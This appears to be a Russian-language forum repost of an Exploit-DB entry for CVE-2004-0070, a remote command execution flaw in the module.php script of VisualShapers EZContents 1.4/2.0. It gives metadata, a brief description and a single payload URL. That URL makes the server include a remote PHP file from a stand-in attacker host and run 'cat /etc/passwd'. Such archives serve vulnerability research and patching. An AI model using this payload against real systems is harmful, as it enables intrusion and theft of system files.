Exploit VisualShapers EZContents 1.4/2.0 - 'module.php' Remote Command Execution

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
23537
Проверка EDB
  1. Пройдено
Автор
ZERO X
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2004-0070
Дата публикации
2004-01-10
Код:
source: https://www.securityfocus.com/bid/9396/info

A problem in handling of specific types of input passed to the module.php script in VisualShapers ezContents has been discovered. Because of this, an attacker may be able to gain unauthorized access to vulnerable systems.

http://www.example.com/module.php?link=http://attacker.example.com/index.php&cmd=cat /etc/passwd
 
Источник
www.exploit-db.com

Похожие темы